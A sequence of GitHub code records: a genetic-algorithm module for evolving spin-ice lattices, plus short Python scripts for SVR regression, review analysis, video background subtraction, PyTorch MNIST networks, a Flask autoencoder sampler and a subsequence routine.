magnets.\"\"\" \n if self.min_magnets is None:\n return self._lattice_shape\n\n num_mags = self.num_magnets()\n if num_mags >= self.min_magnets:\n return self._lattice_shape\n\n even_shape = (self._lattice_shape[0] - (self._lattice_shape[0] % self.hole_tile_shape[0]),\n self._lattice_shape[1] - (self._lattice_shape[1] % self.hole_tile_shape[1])) # make hole_tile fit exactly into lattice_shape\n b = np.sum(even_shape)\n c = self.num_magnets(even_shape) - self.min_magnets\n base_increase = int(np.ceil((-b + np.sqrt(b * b - 4 * c)) / 2))\n bi_x = base_increase * self.hole_tile_shape[0]\n bi_y = base_increase * self.hole_tile_shape[1]\n increase = 0\n while self.num_magnets((self._lattice_shape[0] + bi_x + increase, self._lattice_shape[1] + bi_y + increase)) < self.min_magnets:\n increase += 1\n assert increase <= np.max(self.hole_tile.shape) + 1, f\"Increase {increase} + {base_increase} + {np.max(self.hole_tile.shape)} is too large for hole_tile_shape {self.hole_tile.shape}\"\n return (self._lattice_shape[0] + bi_x + increase, self._lattice_shape[1] + bi_y + increase)\n\n\n @property\n def basis0(self):\n return (self.basis0_len * np.array((np.cos(self.basis0_angle), np.sin(self.basis0_angle))))\n\n @property\n def basis1(self):\n b1_angle = self.basis1_angle + self.basis0_angle\n return (self.basis1_len * np.array((np.cos(b1_angle), np.sin(b1_angle))))\n\n @property\n def angle_tile(self):\n return self.angle_table[self.angle_tile_map]\n\n @property\n def min_holes(self):\n if self._min_holes is None:\n return 0\n if 0 < self._min_holes < 1: # Fraction of holes\n return int(min(np.round(self._min_holes * np.prod(self.hole_tile_shape)), np.prod(self.hole_tile_shape) - 1))\n\n return int(self._min_holes)\n @property\n def max_holes(self):\n if self._max_holes is None:\n return int(np.prod(self.hole_tile_shape) - 1)\n\n if 0 < self._max_holes < 1: # Fraction of holes\n return int(min(np.round(self._max_holes * np.prod(self.hole_tile_shape)), np.prod(self.hole_tile_shape) - 1))\n\n return int(self._max_holes)\n\n @property\n def as_ASI(self):\n return TileLatticeSpinIce(basis0=self.basis0, basis1=self.basis1, angle_tile=self.angle_tile, hole_tile=self.hole_tile, radians=True, size=self.lattice_shape)\n\n\n @property\n def coords(self):\n return self.as_ASI.pos\n\n @property\n def angles(self):\n return self.as_ASI.angle\n\n def reset(self):\n self.fitness = None\n self.fitness_components = []\n self.fitness_info = []\n self._as_asi = None\n\n # ======= Mutation helpers =======================================================\n\n @staticmethod\n def gaussian_mutation(values, std, low=None, high=None, ignore_negative=False):\n negatives = values * (values < 0) if ignore_negative else None\n values = np.random.normal(values, std)\n if low is not None:\n values = np.maximum(values, low)\n if high is not None:\n values = np.minimum(values, high)\n\n if negatives is not None: # restore negatives\n values = values * (negatives == 0) + negatives\n\n return values\n\n @staticmethod\n def swap_mutation(collection):\n if np.ndim(collection) < 2:\n i, j = np.random.choice(len(collection), 2, replace=False)\n collection[i], collection[j] = collection[j], collection[i]\n else:\n flat = np.array(collection).flatten()\n i, j = np.random.choice(len(flat), 2, replace=False)\n flat[i], flat[j] = flat[j], flat[i]\n collection = flat.reshape(collection.shape)\n return collection\n\n @staticmethod\n def mutate_bases(child, strength):\n mag_std = (Individual.basis_max - Individual.basis_min) * strength * 0.01\n 
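# Step sizes scale linearly with strength: strength=1 gives a std of 1% of each parameter's allowed range.\n        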
angle_std = (2 * np.pi) * strength * 0.01\n        child.basis0_len = Individual.gaussian_mutation(child.basis0_len, mag_std, low=Individual.basis_min, high=Individual.basis_max)\n        child.basis0_angle = Individual.gaussian_mutation(child.basis0_angle, angle_std, low=0, high=2 * np.pi)\n\n        # basis1 is a derived property, so mutate the underlying parameters rather than the computed vector\n        child.basis1_len = Individual.gaussian_mutation(child.basis1_len, mag_std, low=Individual.basis_min, high=Individual.basis_max)\n        child.basis1_angle = Individual.gaussian_mutation(child.basis1_angle, angle_std, low=Individual.min_angle_offset, high=np.pi - Individual.min_angle_offset)\n        return child\n\n    @staticmethod\n    def mutate_angle_table(child, strength):\n        std = strength * 0.05\n        child.angle_table = Individual.gaussian_mutation(child.angle_table, std=std, low=0, high=np.pi * 2)\n\n    @staticmethod\n    def mutate_hole_tile(child, strength):\n        if child.hole_tile_max_dim not in (None, 1) and np.random.rand() < 0.25:\n            child._mutate_hole_tile_shape(strength)\n        else:\n            chance = min(strength * 0.05, 0.5)\n            flat = child.hole_tile.flatten()\n            holes = np.nonzero(flat == 0)[0]\n            not_holes = np.nonzero(flat)[0]\n\n            flippable_0 = np.random.choice(holes, len(holes) - child.min_holes, replace=False)\n            flippable_1 = np.random.choice(not_holes, child.max_holes - len(holes), replace=False)\n            flippable = np.concatenate((flippable_0, flippable_1))\n            np.random.shuffle(flippable)\n            do_flip = np.concatenate((np.ones(1), np.random.rand(len(flippable) - 1) < chance)).astype(bool)\n            flat[flippable[do_flip]] = ~flat[flippable[do_flip]].astype(bool)\n            child.hole_tile = flat.reshape(child.hole_tile.shape)\n            assert child.min_holes <= np.sum(child.hole_tile == 0) <= child.max_holes, \"Holes mutated out of bounds\"\n\n    def _mutate_hole_tile_shape(self, strength):\n        assert self.hole_tile_max_dim not in (None, 1), \"Cannot mutate hole tile shape if max dim is 1\"\n        dim = np.random.randint(0, 2)\n        shape = list(self.hole_tile.shape)\n        if shape[dim] == 1 or (np.random.rand() < 0.5 and shape[dim] <= self.hole_tile_max_dim):\n            # make bigger in dim\n            shape[dim] += 1\n            new_tile = np.random.rand(*shape) < 0.5\n            new_tile[:self.hole_tile.shape[0], :self.hole_tile.shape[1]] = self.hole_tile\n        else:\n            # make smaller in dim\n            shape[dim] -= 1\n            new_tile = self.hole_tile[:shape[0], :shape[1]]\n\n        self.hole_tile = new_tile\n        self.hole_tile_shape = new_tile.shape\n        self._fix_holes()\n\n    def _fix_holes(self):\n        \"\"\"Ensure that the number of holes is within the bounds\"\"\"\n        # operate on a flat view so single cells (not whole rows) are flipped\n        flat = self.hole_tile.flatten()\n        num_holes = np.sum(flat == 0)\n        if num_holes < self.min_holes:\n            flat[np.random.choice(np.nonzero(flat)[0], self.min_holes - num_holes, replace=False)] = 0\n        elif num_holes > self.max_holes:\n            flat[np.random.choice(np.nonzero(flat == 0)[0], num_holes - self.max_holes, replace=False)] = 1\n        self.hole_tile = flat.reshape(self.hole_tile.shape).astype(int)\n\n    @staticmethod\n    def mutate_angle_tile_map(child, strength):\n        if child.angle_tile_max_dim not in (None, 1) and np.random.rand() < 0.333:  # mutate shape\n            child._mutate_angle_tile_shape(strength)\n        elif np.random.rand() < 0.5 and np.prod(child.angle_tile_shape) > 1:  # swap angles\n            child.angle_tile_map = Individual.swap_mutation(child.angle_tile_map)\n        else:  # point mutation\n            child.angle_tile_map.flat[np.random.randint(0, len(child.angle_tile_map.flat))] = np.random.randint(0, child.num_angles or np.prod(child.angle_tile_shape))\n\n    def _mutate_angle_tile_shape(self, strength):\n        assert self.angle_tile_max_dim not in (None, 1), \"Cannot mutate shape if max dim is 1\"\n        dim = np.random.randint(0, 2)\n        shape = 
list(self.angle_tile_shape)\n        if shape[dim] == 1 or (np.random.rand() < 0.5 and shape[dim] <= self.angle_tile_max_dim):\n            # make bigger in dim\n            shape[dim] += 1\n            new_map = np.random.randint(0, self.num_angles or np.prod(shape), size=shape)\n            new_map[:self.angle_tile_shape[0], :self.angle_tile_shape[1]] = self.angle_tile_map\n        else:\n            # make smaller in dim\n            shape[dim] -= 1\n            new_map = self.angle_tile_map[:shape[0], :shape[1]]\n        self.angle_tile_shape = tuple(shape)\n        self.angle_tile_map = new_map\n\n\n\n# ======= Crossover helpers =======================================================\n\n    @staticmethod\n    def crossover_bases(child1, child2, parent2):\n        if np.random.rand() < 0.5:\n            child1.basis0_len = parent2.basis0_len\n            child1.basis0_angle = parent2.basis0_angle\n        else:\n            child2.basis0_len = parent2.basis0_len\n            child2.basis0_angle = parent2.basis0_angle\n        if np.random.rand() < 0.5:\n            child1.basis1_len = parent2.basis1_len\n            child1.basis1_angle = parent2.basis1_angle\n        else:\n            child2.basis1_len = parent2.basis1_len\n            child2.basis1_angle = parent2.basis1_angle\n\n    @staticmethod\n    def crossover_angle_table_and_map(child1, child2, parent2):\n        \"\"\"Crossover angle table and angle tile map. If both parents' tile_map/table have the same shape, the children will keep that shape.\"\"\"\n        for child in (child1, child2):\n            child.angle_tile_map = Individual.crossover_arrays(child.angle_tile_map, parent2.angle_tile_map)\n            child.angle_tile_shape = child.angle_tile_map.shape\n            child.angle_table = Individual.crossover_arrays_1d(child.angle_table, parent2.angle_table,\n                                                               size=child.num_angles if child.num_angles is not None else np.prod(child.angle_tile_shape))\n\n    @staticmethod\n    def crossover_hole_tile(child1, child2, parent2):\n        \"\"\"Crossover hole tile. If both parents' hole tiles have the same shape, the children will keep that shape.\"\"\"\n        for child in (child1, child2):\n            child.hole_tile = Individual.crossover_arrays(child.hole_tile, parent2.hole_tile)\n            child.hole_tile_shape = child.hole_tile.shape\n            child._fix_holes()\n\n    @staticmethod\n    def crossover_evo_params(child1, child2, parent2):\n        for param, rnd in zip(parent2._evolved_params, np.random.random(len(parent2._evolved_params))):\n            if rnd > 0.5:\n                child1.evolved_params_values[param] = deepcopy(parent2.evolved_params_values[param])\n            else:\n                child2.evolved_params_values[param] = deepcopy(parent2.evolved_params_values[param])\n\n    @staticmethod\n    def crossover_arrays(arr1, arr2):\n        \"\"\"Crossover two arrays; they may have different shapes but must share the same ndim. The new shape is random between the two\"\"\"\n        assert arr1.ndim == arr2.ndim, \"Arrays must have same number of dimensions\"\n        if arr1.ndim == 1:\n            return Individual.crossover_arrays_1d(arr1, arr2)\n        assert arr1.ndim == 2, \"Arrays must be 1d or 2d\"\n        shape = (Individual.randint_between(arr1.shape[0], arr2.shape[0]), Individual.randint_between(arr1.shape[1], arr2.shape[1]))\n        rand = np.random.rand(*shape)\n        arr = np.zeros_like(rand).astype(arr1.dtype)\n        for i in range(shape[0]):\n            for j in range(shape[1]):\n                if Individual.valid_index(arr1, i, j) and Individual.valid_index(arr2, i, j):\n                    arr[i, j] = arr1[i, j] if rand[i, j] < 0.5 else arr2[i, j]\n                elif Individual.valid_index(arr1, i, j):\n                    arr[i, j] = arr1[i, j]\n                elif Individual.valid_index(arr2, i, j):\n                    arr[i, j] = arr2[i, j]\n                else:  # sample random value from arr1 or arr2\n                    arr[i, j] = np.random.choice(np.concatenate((arr1.flatten(), arr2.flatten())))\n\n        return arr\n\n    @staticmethod\n    def valid_index(arr, i, j):\n        return i >= 0 and j >= 0 and i < arr.shape[0] 
and j < arr.shape[1]\n\n    @staticmethod\n    def crossover_arrays_1d(arr1, arr2, size=None):\n        \"\"\"Crossover two 1d arrays; the new length is random between the two if size is None.\n        If size is not None, the new array will be of that length; if extra values are needed,\n        they are filled with random samples from arr1 and arr2\"\"\"\n        if size is None:\n            size = Individual.randint_between(len(arr1), len(arr2))\n        arr = np.zeros(size).astype(arr1.dtype)\n        longest = arr1 if len(arr1) > len(arr2) else arr2\n        shortest = arr1 if len(arr1) < len(arr2) else arr2\n        arr[:len(shortest)] = np.where(np.random.rand(len(shortest)) > 0.5, shortest, longest[:len(shortest)])\n        arr[len(shortest):len(longest)] = longest[len(shortest):len(longest)]\n        if len(arr) > len(longest):\n            diff = len(arr) - len(longest)\n            arr[len(longest):] = np.random.choice(np.hstack((longest, shortest)), diff)\n        return arr\n\n    @staticmethod\n    def randint_between(a, b, inclusive=True):\n        if a == b:\n            return a\n        if a > b:\n            a, b = b, a\n        if inclusive:\n            return np.random.randint(a, b + 1)\n        return np.random.randint(a + 1, b)\n# ===================================================================================\n\n    def mutate(self, strength=1):\n        child = self.copy(parent_ids=[self.id])\n        mutations = [Individual.mutate_bases, Individual.mutate_angle_table, Individual.mutate_angle_tile_map]\n        if self.max_holes != self.min_holes:\n            mutations.append(Individual.mutate_hole_tile)\n\n        weights = [1] * len(mutations)\n        if len(self.evolved_params_values) > 0:\n            mutations += [Individual.mutate_evo_param]\n            # increase chance of selecting param-mutation by the num of evo params so they are picked evenly\n            weights += [len(self.evolved_params_values)]\n        mutation = np.random.choice(mutations, p=np.array(weights) / np.sum(weights))\n        mutation(child, strength)\n        child.reset()\n        return [child]\n\n    def crossover(self, other):\n        child1 = self.copy(parent_ids=[self.id, other.id])\n        child2 = self.copy(parent_ids=[self.id, other.id])\n        Individual.crossover_bases(child1, child2, other)\n        Individual.crossover_angle_table_and_map(child1, child2, other)\n        Individual.crossover_hole_tile(child1, child2, other)\n        Individual.crossover_evo_params(child1, child2, other)\n        child1.reset()\n        child2.reset()\n        return [child1, child2]\n\n    @staticmethod\n    def from_string(string, keep_pheno=False, **override_kwargs):\n        array = np.array\n        kwargs = eval(string)\n        kwargs.update(override_kwargs)\n\n        return Individual(**kwargs)\n\n    def __repr__(self):\n        ignored_attrs = ['pos', 'angle']\n        return repr({k: v for k, v in vars(self).items() if k not in ignored_attrs})\n\n    def copy(self, **override_kwargs):\n        ignored_attrs = ['pos', 'angle', 'id', 'gen']\n        rename_attrs = {'_lattice_shape': 'lattice_shape', '_max_holes': 'max_holes', '_min_holes': 'min_holes'}\n        params = {k: v for k, v in vars(self).items() if k not in ignored_attrs}\n        params.update(override_kwargs)\n        for old_name, new_name in rename_attrs.items():\n            if old_name in params:\n                params[new_name] = params.pop(old_name)\n\n        return Individual(**params)\n\n    @staticmethod\n    def get_default_shared_params(outdir=\"\", gen=None, select_param=None):\n        default_params = {\n            \"model\": \"TileLatticeSpinIce\",\n            \"encoder\": \"AngleSine\",\n            \"radians\": True,\n        }\n        if select_param is not None:\n            return default_params[select_param]\n        if gen is not None:\n            outdir = os.path.join(outdir, f\"gen{gen}\")\n        default_params[\"basepath\"] = outdir\n\n        return default_params\n\n    @staticmethod\n    def get_default_run_params(pop, sweep_list=None, *, condition=None):\n        sweep_list = 
sweep_list or [[0, 0, {}]]\n\n    id2indv = {individual.id: individual for individual in [p for p in pop if condition is None or condition(p)]}\n\n    run_params = []\n    for id, indv in id2indv.items():\n        for i, j, rp in sweep_list:\n            run_params.append(dict(rp, indv_id=id, basis0=indv.basis0, basis1=indv.basis1, angle_tile=indv.angle_tile, hole_tile=indv.hole_tile,\n                                   size=indv.lattice_shape, sub_run_name=f\"_{i}_{j}\"))\n    return run_params\n\n\ndef main(outdir=r\"results\\tileTest\", inner=\"flips\", outer=\"default\", minimize_fitness=True, calculate_fit_only=False, **kwargs):\n    known_fits = {\n\n    }  # genotype-specific fitnesses\n\n    inner = known_fits.get(inner, fitness_functions.known_fits.get(inner, inner))\n    outer = known_fits.get(outer, fitness_functions.known_fits.get(outer, outer))\n\n    if calculate_fit_only:\n        return ea.only_run_fitness_func(outdir, Individual, inner, outer, minimize_fitness=minimize_fitness, **kwargs)\n    else:\n        return ea.main(outdir, Individual, inner, outer, minimize_fitness=minimize_fitness, **kwargs)\n\n\ndef random_range(min, max, shape=None):\n    if shape is None:\n        return min + (max - min) * np.random.rand()\n    else:\n        return min + (max - min) * np.random.rand(*shape)\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) > 1:\n        import argparse\n        import logging\n        from flatspin.cmdline import StoreKeyValue, eval_params\n        from base_individual import make_parser\n\n        parser = make_parser()\n        args = parser.parse_args()\n\n        evolved_params = eval_params(args.evolved_param)\n        if args.evo_rotate:\n            evolved_params[\"initial_rotation\"] = [0, 2 * np.pi]\n\n        outpath = os.path.join(os.path.curdir, args.output)\n        logpath = os.path.join(outpath, args.log)\n        if not os.path.exists(outpath):\n            os.makedirs(outpath)\n        logging.basicConfig(filename=logpath, level=logging.INFO)\n        main(\n            outdir=args.output,\n            **eval_params(args.parameter),\n            evolved_params=evolved_params,\n            individual_params=eval_params(args.individual_param),\n            outer_eval_params=eval_params(args.outer_eval_param),\n            sweep_params=args.sweep_param,\n            dependent_params=args.dependent_param,\n            repeat=args.repeat,\n            repeat_spec=args.repeat_spec,\n            group_by=args.group_by,\n            calculate_fit_only=args.calculate_fit_only,\n        )\n","repo_name":"SocratesNFR/flatspin-evo","sub_path":"lattice_geno.py","file_name":"lattice_geno.py","file_ext":"py","file_size_in_byte":23421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"70958484355","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVR\n\ndataset = pd.read_csv(\"Position_Salaries.csv\")\nx = dataset.iloc[:, 1:-1].values\ny = dataset.iloc[:, -1].values\n\n# Feature Scaling\n\n# Reshaping y into a 2D array\n# reshape's first argument is the desired shape:\n# we give the length and the number of columns\ny = y.reshape(len(y), 1)\n\nsc_x = StandardScaler()\nsc_y = StandardScaler()\nx = sc_x.fit_transform(x)\ny = sc_y.fit_transform(y)\n\n# Training a model with SVR\nregressor = SVR(kernel=\"rbf\")\nregressor.fit(x, y.ravel())  # SVR expects a 1-D target array\n\n# Predicting a new result\nprediction = sc_y.inverse_transform(regressor.predict(sc_x.transform([[6.5]])).reshape(-1, 1))\n\n# Visualizing the SVR results\nplt.scatter(sc_x.inverse_transform(x), sc_y.inverse_transform(y), color=\"red\")\nplt.plot(sc_x.inverse_transform(x), sc_y.inverse_transform(regressor.predict(x).reshape(-1, 1)),\n         color=\"blue\")\nplt.title(\"Support Vector Regression Model\")\nplt.xlabel(\"Position 
Level\")\nplt.ylabel(\"Salary\")\nplt.show()\n\n# Visualizing the SVR results with a higher resolution and smoother curve\nx_grid = np.arange(min(sc_x.inverse_transform(x)), max(sc_x.inverse_transform(x)), 0.1)\nx_grid = x_grid.reshape((len(x_grid), 1))\nplt.scatter(sc_x.inverse_transform(x), sc_y.inverse_transform(y), color=\"red\")\nplt.plot(x_grid, sc_y.inverse_transform(regressor.predict(sc_x.transform(x_grid)).reshape(-1, 1)),\n         color=\"blue\")\nplt.title(\"Support Vector Regression Model (Smoother Curve)\")\nplt.xlabel(\"Position Level\")\nplt.ylabel(\"Salary\")\nplt.show()\n","repo_name":"Charanvir/Support-Vector-Regression","sub_path":"support_vector_regression.py","file_name":"support_vector_regression.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"3669586677","text":"data = []\ncount = 0\nwith open('reviews.txt','r') as f:\n    for line in f:\n        data.append(line)\n        count += 1\n        if count % 1000 == 0:\n            print(len(data))\n\nprint('file read finished, total of', len(data))\n\n# average message length\nsum_len = 0\nfor d in data:\n    sum_len = sum_len + len(d)\nprint('The average length of a message is:', sum_len/len(data))\n\nnew = []\nfor d in data:\n    if len(d) < 100:\n        new.append(d)\nprint('In total,', len(new), 'reviews are shorter than 100 characters!')","repo_name":"waterboyop/review-analytics","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"8577470152","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom cv2 import cv2\nfrom matplotlib import pyplot as plt\nimport random\n\n\n\nclass MedianFiltering():\n    \"\"\"\n    Class representing the median filtering approach for background modeling.\n    \"\"\"\n    def __init__(self, alpha, T):\n        \"\"\"\n        Parameters\n        ----------\n        alpha : float\n            The adaption rate for the median filter\n\n        T : int\n            The thresholding value for the binary image\n        \"\"\"\n        self.alpha = alpha\n        self.T = T\n\n    def create_binary_images(self, frames, visualize):\n        \"\"\"Given all the frames, set all frames' likelihood image\"\"\"\n        # approx median,\n        # converge slowly to background\n        # m = np.ones((height, width))\n        # m *= 128\n        # or assume first frame is background\n        m = frames[0].rgb_image\n        tot_frames = len(frames)\n\n        for t in range(tot_frames):\n            # What the code does:\n            # for i in range(width):\n            #     for j in range(height):\n            #         if frame_list.frames[t][j][i] > m[j][i]:\n            #             m[j][i] += alpha\n            #         else:\n            #             m[j][i] -= alpha\n            #\n            #         # segment binary\n            #         if abs(frame_list.frames[t][j][i] - m[j][i]) > T:\n            #             binary[t][j][i] = 1\n            # Vectorized\n            pix_largthan_med = np.greater(frames[t].rgb_image, m)\n            m = m + self.alpha * pix_largthan_med + self.alpha * (pix_largthan_med - 1)  # +alpha where it's larger, -alpha where smaller\n            bin_im_rgb = 1*np.greater(np.absolute(frames[t].rgb_image - m), self.T).astype('uint8')\n            frames[t].binary_image = np.zeros((bin_im_rgb.shape[0],bin_im_rgb.shape[1]))\n            for i in range(2):\n                frames[t].binary_image = np.logical_or(frames[t].binary_image, bin_im_rgb[:,:,i])\n            frames[t].binary_image = frames[t].binary_image.astype('uint8')\n\n            # To visualize every 5th frame:\n            if visualize:\n                self.visualize_filtering(frames)\n        \n\n    def visualize_filtering(self, frames):\n        tot_frames = len(frames)\n        plt.figure()\n        i = 0\n        display_image = True\n        while display_image:\n            plt.imshow(frames[i].binary_image, cmap='gray')\n            
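# A brief pause gives matplotlib time to draw the frame before it is cleared.\n            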
plt.pause(0.0001)\n            plt.clf()\n            i += 5\n            if i >= tot_frames:\n                display_image = False\n\n\n    def suppress_shadows(self, frames, visualize):\n        # The hypothesis is that a shadowed pixel's value (brightness) and saturation\n        # will decrease while the hue remains relatively constant.\n        \n        # H = channel 0 (Hue)\n        # S = channel 1 (Saturation)\n        # V = channel 2 (Value / brightness)\n\n        alpha = 0.3\n        beta = 0.9\n        Ts = 0.3\n        Th = 0.5\n\n        tot_frames = len(frames)\n        pixels_states = frames[0].binary_image\n        previous_hhvvss = cv2.cvtColor(frames[0].rgb_image, cv2.COLOR_BGR2HSV)\n        for t in range(tot_frames):\n            print(\"frame no: \", t)\n            \n            hsv_frame = cv2.cvtColor(frames[t].rgb_image, cv2.COLOR_BGR2HSV)\n\n            temp1 = np.logical_xor(frames[t].binary_image, pixels_states)\n            temp2 = frames[t].binary_image  # foreground == 1\n\n            moved_pixels = np.logical_and(temp1, temp2)\n\n            \n            Xfl = hsv_frame[:, :, 2]\n            Xfs = hsv_frame[:, :, 1]\n            Xfh = hsv_frame[:, :, 0]\n\n            Xbl = previous_hhvvss[:, :, 2]\n            Xbs = previous_hhvvss[:, :, 1]\n            Xbh = previous_hhvvss[:, :, 0]\n\n            Xbl = np.where(Xbl <= 0, -1, Xbl)\n            div = np.divide(Xfl, Xbl)\n            diff = np.array(Xfs) - np.array(Xbs)\n            abs_diff = np.absolute(np.array(Xfh) - np.array(Xbh))\n\n            cond1 = np.logical_and(alpha <= div, beta >= div)\n            cond2 = diff <= Ts\n            cond3 = abs_diff <= Th\n\n            # np.logical_and is binary (a third positional argument is 'out'), so chain the conditions explicitly\n            potential_shadowed_pixels = np.logical_and(np.logical_and(cond1, cond2), cond3)\n            potential_shadowed_pixels = np.logical_not(potential_shadowed_pixels)\n            potential_shadowed_pixels = np.logical_and(potential_shadowed_pixels, moved_pixels)\n\n            frames[t].binary_image = np.where(potential_shadowed_pixels == 1, 0.25, frames[t].binary_image)\n\n            pixels_states = frames[t].binary_image\n            previous_hhvvss = hsv_frame\n\n            if visualize:\n                self.visualize_filtering(frames)\n\n        # width = p.shape[1]\n        # height = p.shape[0]\n        # for i in range(width):\n        #     for j in range(height):\n        #         if (frames[t].binary_image[j][i] == 1 # loop over all foreground pixels\n        #                 and frames[t].binary_image[j][i] != pixels_states[j][i]): # which have changed\n\n        #             Xfl = hsv_frame[j][i][2]\n\n        #             Xbl = self.calculate_previous_hsv_values(previous_hhvvss, j, i, 2)\n        #             if(Xbl == 0):\n        #                 break\n\n        #             Xfs = hsv_frame[j][i][1]\n        #             Xbs = self.calculate_previous_hsv_values(previous_hhvvss, j, i, 1)\n\n        #             Xfh = hsv_frame[j][i][0]\n        #             Xbh = self.calculate_previous_hsv_values(previous_hhvvss, j, i, 0)\n\n        #             if( (alpha <= (Xfl/Xbl) <= beta) \n        #                 and ((Xfs - Xbs) <= Ts) \n        #                 and (abs(Xfh - Xbh) <= Th) ):\n        #                 #print(\"pixel \", j, i, \"unaltered\")\n        #                 frames[t].binary_image[j][i] = 1\n        #             else:\n        #                 #print(\"pixel \", j, i, \"altered\")\n        #                 frames[t].binary_image[j][i] = 0.5\n\n","repo_name":"TSBB15-2021-group-4/object-tracking","sub_path":"own/background_model/MedianFiltering.py","file_name":"MedianFiltering.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"26785230116","text":"\"\"\"\n    kuzu.py\n    COMP9444, CSE, UNSW\n\"\"\"\n\nfrom __future__ import print_function\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass NetLin(nn.Module):\n    # linear function followed by softmax\n    def __init__(self):\n        super(NetLin, self).__init__()\n        # INSERT CODE HERE\n        self.linear = nn.Linear(784, 10)\n        self.softmax = nn.LogSoftmax()\n\n    def forward(self, x):\n        x = x.view(x.shape[0], -1)\n        x = self.linear(x)\n        x = self.softmax(x)\n        return x\n\nclass NetFull(nn.Module):\n    # two fully connected tanh layers followed by log softmax\n    def __init__(self):\n        super(NetFull, 
self).__init__()\n self.hidden = nn.Linear(784, 64)\n self.output = nn.Linear(64, 10)\n self.softmax = nn.LogSoftmax()\n\n def forward(self, x):\n x = x.view(x.shape[0], -1)\n x = F.tanh(self.hidden(x))\n x = self.output(x)\n x = self.softmax(x)\n return x\n\nclass NetConv(nn.Module):\n # two convolutional layers and one fully connected layer,\n # all using relu, followed by softmax\n def __init__(self):\n super(NetConv, self).__init__()\n self.conv1 = nn.Conv2d(1, 20, 5)\n self.conv2 = nn.Conv2d(20, 80, 5)\n self.linear = nn.Linear(1280, 64)\n self.output = nn.Linear(64, 10)\n self.softmax = nn.LogSoftmax()\n\n def forward(self, x):\n x = F.max_pool2d(F.relu(self.conv1(x)), 2)\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(x.shape[0], -1)\n x = F.tanh(self.linear(x))\n x = self.output(x)\n x = self.softmax(x)\n return x\n\n'''\nif __name__ == '__main__':\n net = NetConv()\n print('#Parameters number:', sum(param.numel() for param in net.parameters()))\n'''","repo_name":"Starlight972/UNSW-Projects","sub_path":"COMP9444 Neural Networks and Deep Learning/Assignment 1/hw1/kuzu.py","file_name":"kuzu.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34007933914","text":"def seq(a,prev,i,s):\n\tif(prev[i]==-1):\n\t\ts.append(a[i])\n\t\treturn s\n\telse:\n\t\ts.append(a[i])\n\t\tseq(a,prev,prev[i],s)\n\ndef lis(a,n):\n\tdp=[1]*n\n\tprev=[-1]*n\n\tfor i in range(1,n):\n\t\tfor j in range(i):\n\t\t\tif(a[i]>a[j] and dp[i] pd.DataFrame:\n return df","repo_name":"webzerg/tableshift","sub_path":"tableshift/datasets/physionet.py","file_name":"physionet.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32250088724","text":"from flask import Flask\nimport io\nfrom flask import send_file\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras import Model\nfrom PIL import Image\n\n\napp = Flask(__name__)\n\n\n# Note 1: We need this loss function here to reconstruct the model.\ndef loss (y_true, y_pred):\n \"\"\" This loss computes the squared difference between the predicted and\n true value; averaged across the batch.\n \"\"\"\n result = (y_true - y_pred) ** 2\n loss_batch = tf.math.reduce_sum(result, axis=-1)\n mean_loss = tf.math.reduce_mean(loss_batch)\n return mean_loss\n\n\nmodel_path = \"logs/20200311-203307/ckpt/weights.03-0.02.hdf5\"\nnet = tf.keras.models.load_model( model_path\n , custom_objects = {\"loss\": loss} )\n\n\n# Note 2: Pick out the z-dim from the network, and let's just\n# display the network for good measure.\nz_dim = net.get_layer(\"z\").output.shape[-1]\n\nnet.summary()\n\n\n# Note 3: \n# In TF2/Keras it's a bit annoying to sample from the model. If we\n# want to run a $z$ vector through, we need to build the output from\n# a new input. 
So we just pick out all layers after the $z$ layer, and\n# then apply them to our input.\nin_z = tf.keras.Input(shape=(10))\nlayers = net.layers[6:] # Layer 6 is the one after the \"z\" layer.\noutput = in_z\nfor l in layers:\n output = l(output)\n\nsample_model = Model( in_z, outputs=output )\nsample_model.summary()\n\n\n@app.route(\"/\")\ndef index ():\n return \"Visit /sample/312.\"\n\n\n@app.route(\"/sample/\")\ndef sample (seed=2):\n\n # Note 4: We can just pick a random z vector now; and push it through the\n # network, then get out an image, and render it.\n np.random.seed(seed)\n z_vect = np.random.uniform(-1, 1, (1, z_dim))\n\n\n img = sample_model.predict(z_vect)\n img = Image.fromarray(img.squeeze() * 255)\n img = img.resize((200, 200), Image.ANTIALIAS)\n\n sprite = Image.new(mode=\"L\", size=(200, 200))\n sprite.paste(img)\n\n arr = io.BytesIO()\n # Annoyingly, there is a bug in flask that means we need to write to\n # a tmp file. If flask was well-behaved, we could serve the image directly\n # from the `BytesIO` object.\n sprite.save(\"/tmp/img.jpg\", format=\"jpeg\")\n\n resp = send_file(\"/tmp/img.jpg\", mimetype='image/jpeg')\n\n return resp\n","repo_name":"BraneShop/autoencoder-fashion-mnist","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5659581297","text":"'''\r\nCreated on Oct 24, 2019\r\n\r\n@author: Tonirel\r\n'''\r\nfrom Adaugare import create_tz,get_suma,get_tip,get_zi,valid_tz,add_tz, create_state\r\nfrom Cautari import sum_gr8_than,b4_day_gr8_than,tz_anumit_tip\r\nfrom Service import sv_el_tz_tip,sv_sum_tip,sv_sold,sv_tz_tip_ord,sv_del_tz_zi,sv_del_tz_per,sv_del_tz_tip,sv_el_tz_small_and_type,sv_undo\r\ndef run_all_tests():\r\n 